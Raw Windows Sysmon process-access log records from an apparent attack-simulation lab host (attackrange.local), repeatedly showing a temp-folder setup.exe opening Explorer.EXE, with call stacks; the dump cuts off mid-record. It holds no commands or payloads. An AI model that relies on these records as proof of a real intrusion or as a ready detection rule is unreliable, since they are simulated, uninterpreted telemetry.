13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows